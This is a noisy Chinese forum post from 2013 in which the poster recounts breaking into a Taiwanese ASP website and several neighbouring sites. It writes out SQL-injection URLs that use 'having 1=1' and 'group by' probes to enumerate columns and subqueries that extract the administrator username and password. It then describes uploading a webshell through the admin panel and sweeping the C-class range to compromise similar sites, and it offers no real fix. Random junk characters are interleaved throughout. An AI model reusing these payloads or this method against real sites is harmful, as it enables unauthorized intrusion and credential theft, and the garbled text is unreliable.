发现一个注入点% b" p" E% a I
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833895 I h! \' ~; j6 K1 L
' C/ s: \" E: ? }6 S& I7 V0 _
习惯性的加’having1=1-- J& I9 h7 u' J( e6 h
! E. |7 W5 X$ ?: i5 fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
2 G; f$ r# K5 Z, \- e4 q
1 |6 r$ |9 f. D0 R9 F0
; u' S2 r& j" ^5 G7 B: ^
$ U" J) Y7 V" f3 Y. V5 {爆出Diary_A.dl_Title(这时候很激动啊)& |7 m/ d/ ]3 T4 p% ]- W" y) w
! {4 p6 {5 r: Q+ L& d$ J那么继续5 e i9 ^' m& r, j: J2 f# T$ f1 c
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
$ O( N; k. y8 W
; V" m) |8 y( B( |1 F" M继续,一直爆下去
; c |2 z- v) a+ F# _- r3 m0 x& V# X; O
爆到几个字段和表段 但是没找到需要的管理用户的字段7 j$ N& ]" R1 C" g9 L
' ^5 b' }- x3 [( h6 o蛋疼了 怎么办 然后去后台登陆页看源码- G, G! u; v# O7 A5 N
+ X' o, F. G& L7 ?2 l
09 A$ g, U5 s7 O8 J( q% S. I7 J
f, A$ G4 k7 a6 j- i+ L
Input name= “ADUID”
7 p$ ]3 P, r" d1 w) C {5 f% [6 EInput name= “ADPWD”+ x$ U0 ]: g) @; w7 |, j
& w+ _: ^' w1 P4 u' k, f很幸运 找到了字段那就继续
' k) \. q! g9 g9 w找到之后开始爆用户
3 r. F7 u" i1 [ t! Qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—% L4 i( V# v$ M: W4 k
爆密码
- J' I# o# Y" o* ]/ `http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
, I+ O9 h9 b5 C0 j+ [( c测试了下 这个注入点只能爆到文章哪里的表
3 a) b, w* c/ t) g$ E1 T/ P0 R, p% j8 ^( R5 I& E% c. Z# o
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了! R2 \$ k7 l- b' A1 h3 [8 Y
3 ?+ a* \! o p, }3 j3 e又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了6 }8 a, u2 A/ _$ E
- C2 B* q: [4 P1 U4 l1 `$ Q2 ?, _: _
473
0 [, L5 T! k4 J: `: e- Q5 L; z% d% {' L
进后台+ u* A5 K! z+ ?1 u, ~+ @* }
, @; R- i/ R9 J4 q+ Y6 B' s/ q$ M) p3 x
4 W, S. q* C' Q% j( h% a! H* [1 g9 |7 I发现几个上传点 有的地方不能上传 而且防止恶意代码
5 r3 S0 F1 P0 m' g9 P
: ~6 W E) G- E8 w* [, u没办法 各种百度各种找大牛 找到一只好像可以突破的马5 G9 e' |5 z. F
* y& s+ O$ V. N/ U
/ t9 _1 S$ b, p" r
在系统管理那里直接上传 不过没有显示地址
* p- H6 {' ~/ d; X0 l7 e- q
' E3 d4 ?) C9 y6 r/ K再上传一次 抓包 搞定OK. i ?8 S* l) [1 ^: c4 E" B9 [
' O3 C' q# i# I/ ~' N! @
) `" v, f% V* ?7 M, p3 ~
& s: _5 [& M4 Q1 }) ?
472. E/ \- R: i- C2 y- `+ o) E
3 n7 r6 r) C2 a
晚上不行了 去睡觉。。。
) Q: b, t/ N2 V第二天刚起床 闲的没事做继续日站吧 # s4 y7 |3 T& C, X
9 [$ u& J- D4 p2 m6 P' M# X( O: \找个站 就把这个站的旁c扫了下
& _: p. s/ {4 C! D/ A/ J5 d
* e. U1 W- t5 ~发现c段也有一个购物站 ,然后还和这个站的模板差不多
8 o$ H; a% E3 R- S+ z+ v( J9 { V. M P/ b' v; `$ w. c
就找到会员登录口测试, F! t" g% ]) y0 ~5 ^
" N1 l$ \1 f8 |
'and (select top 1 MGR_UID from A_MGR)>0—
/ v; @$ ~7 q r5 N$ V5 y# N3 F果断爆到了 这时候我很激动 通杀+ a& H' d: Z. w2 h( S$ u+ g! Q3 f3 O
2 A8 e3 J9 @$ l" r9 {3 l
再次翻c段
( ]4 k9 {$ N2 p1 K) G$ Q i* e, R
1 u. O, r+ U1 }% z h翻出几个站 都成功拿下
" @; e2 m. o" ~4 E5 ? j4 W* `9 F: [1 O4 s9 H _# l$ s
% o- v" W5 U/ Y3 t& k8 R& E
' q% L. I: w& d修复方案:
$ Q1 n) V4 z. x他们比我专业
; f a5 @+ }1 N/ Q7 ~; O( P1 x
4 c& {5 U, _+ R# m' a- s( V
4 }( J+ c; x5 y0 A2 v: O9 R
: f/ m% ?/ _% E5 a |
发表于 2013-4-4 17:40:38
收藏
支持
反对